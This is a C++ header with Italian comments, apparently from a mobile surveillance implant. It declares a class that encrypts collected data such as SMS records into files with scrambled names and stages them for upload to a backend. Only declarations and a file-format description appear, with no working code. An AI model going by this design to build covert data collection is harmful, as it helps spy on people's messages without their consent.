#include "Common.h"
#include "Encryption.h"
#include <exception>
#include <vector>
#include <string.h>
using namespace std;

#ifndef __Log_h__
#define __Log_h__

BOOL SortLogs(const LogInfo& lInfo, const LogInfo& rInfo);

/*			LOG FORMAT
 *
 *  -- Naming Convention
 *	Il formato dei log e' il seguente:
 *	Il nome del file in chiaro ha questa forma: ID_AGENTE-LOG_TYPE-SEQUENCE.mob
 *	e si presenta cosi': xxxx-xxxx-dddd.mob
 *	Il primo gruppo e' formato generalmente da 4 cifre in esadecimali, il secondo
 *	e' formato generalmente da una cifra esadecimale, il terzo gruppo e' un numero
 *	di sequenza in formato decimale. Ognuno dei tre gruppi puo' essere composto da
 *	1 fino a 8 cifre. Il nome del file viene scramblato con il primo byte della
 *	chiave utilizzata per il challenge.
 *
 *	-- Header
 *	Il log cifrato e' cosi' composto:
 *	all'inizio del file viene scritta una LogStruct non cifrata, il membro FileSize indica la
 *	lunghezza complessiva di tutto il file. Dopo la LogStruct troviamo il filename in WCHAR, 
 *	quindi i byte di AdditionalData se presenti e poi il contenuto vero e proprio.
 *
 *	-- Data
 *	Il contenuto e' formato da una DWORD in chiaro che indica la dimensione del blocco
 *	unpadded (va quindi paddata a BLOCK_SIZE per ottenere la lunghezza del blocco cifrato)
 *	e poi il blocco di dati vero e proprio. Questa struttura puo' esser ripetuta fino alla
 *	fine del file.
 *
 *	-- Global Struct
 *	|Log Struct|FileName|AdditionalData|DWORD Unpadded|Block|.....|DWORD Unpadded|Block|.....|
 *
 *	Un log puo' essere composto sia da un unico blocco DWORD-Dati che da piu' blocchi DWORD-Dati.
 *
 */

class Log
{
	/**
	 * Indica il nome scramblato del file di log sul quale eseguire i vari metodi, va deallocato dal distruttore.
	 */
	private: WCHAR* wEncName;

	/**
	 * Rappresenta il nome in chiaro del file di log, va deallocato dal distruttore.
	 */
	private: WCHAR* wName;

	private: HANDLE hFile;
	private: Encryption *encryptionObj;

	/**
	 * Rappresenta la lista dei log in un dato istante, va cancellata dal distruttore
	 */
	private: list<LogInfo> *pLogSnapshot;

	/**
	 * Questa funzione prende i byte puntati da pByte, li cifra e li scrive su un file di Log nuovo,
	 * la lunghezza del buffer puntato da pByte e' data da uLen, Id e' l'id dell'agente, Type il tipo
	 * di log (sms da rubrica, da sim etc...), Seq e' un numero sequenziale che va incrementato dall'agente
	 * per ogni log che vuole creare, uAdditional rappresenta il numero di byte da scrivere nella struttura
	 * dell'header dopo la LogStruct e che puo' contenere dati addizionali utilizzati dal backend. Se
	 * il file gia' esiste Seq viene incrementato fino a trovare un nome libero. La funzione torna TRUE se
	 * la scrittura e' andata a buon fine, FALSE altrimenti. Prima di ogni blocco dati c'e' una DWORD che 
	 * identifica la lunghezza NON paddata del blocco scritto.
	 */
	public: BOOL WriteLog(UINT Id, UINT Type, UINT Seq, BYTE* pByte, UINT uLen, UINT uAdditional);

	/**
	* Questa funzione prende i byte puntati da pByte, li cifra e li scrive su un file di Log gia' presente,
	* la lunghezza del buffer puntato da pByte e' data da uLen, La funzione torna TRUE se la scrittura e' andata a 
	* buon fine, FALSE altrimenti. Prima di ogni blocco dati c'e' una DWORD in chiaro che identifica la lunghezza NON
	* paddata del blocco scritto.
	*/
	public: BOOL AppendLog(BYTE* pByte, UINT uLen);

	/**
	 * Chiude il file di log. Torna TRUE se il file e' stato chiuso con
	 * successo, FALSE altrimenti.
	 */
	public: BOOL CloseLog();

	/**
	 * Rimuove un file di log che ha come nome wLogName. Torna TRUE se la rimozione e' andata a buon fine,
	 * FALSE altrimenti.
	 */
	public: BOOL RemoveLog(WCHAR* wLogName);

	/**
	 * Lista tutti i log presenti nella cartella dei log e riempie il vettore. Torna NULL in caso di errore, o se non ci sono
	 * log ed un valore diverso da 0 se la funzione ha trovato dei file. Il vettore ed i relativi membri vanno liberati
	 * dal chiamante.
	 */
	public: list<LogInfo>* ListLogs();

	/**
	 * Genera una lista di tutti i log file presenti al momento della chiamata alla funzione. Questo metodo
	 * va chiamato dopo aver usato la StopAgents() e la StopEvents() in modo da ottenere una lista di file
	 * senza lock da poter inviare durante la sync. Torna TRUE se lo snapshot e' stato acquisito correttamente,
	 * FALSE altrimenti.
	 */
	public: BOOL MakeLogSnapshot();

	/**
	 * Torna il puntatore ad uno snapshot ottenuto tramite la MakeLogSnapshot(). Torna NULL in caso di errore.
	 * La lista viene liberata dal distruttore della classe oppure da un'ulteriore chiamata a MakeLogSnapshot().
	 */
	public: list<LogInfo>* GetLogSnapshot();

	Log();
	~Log();
};

#endif
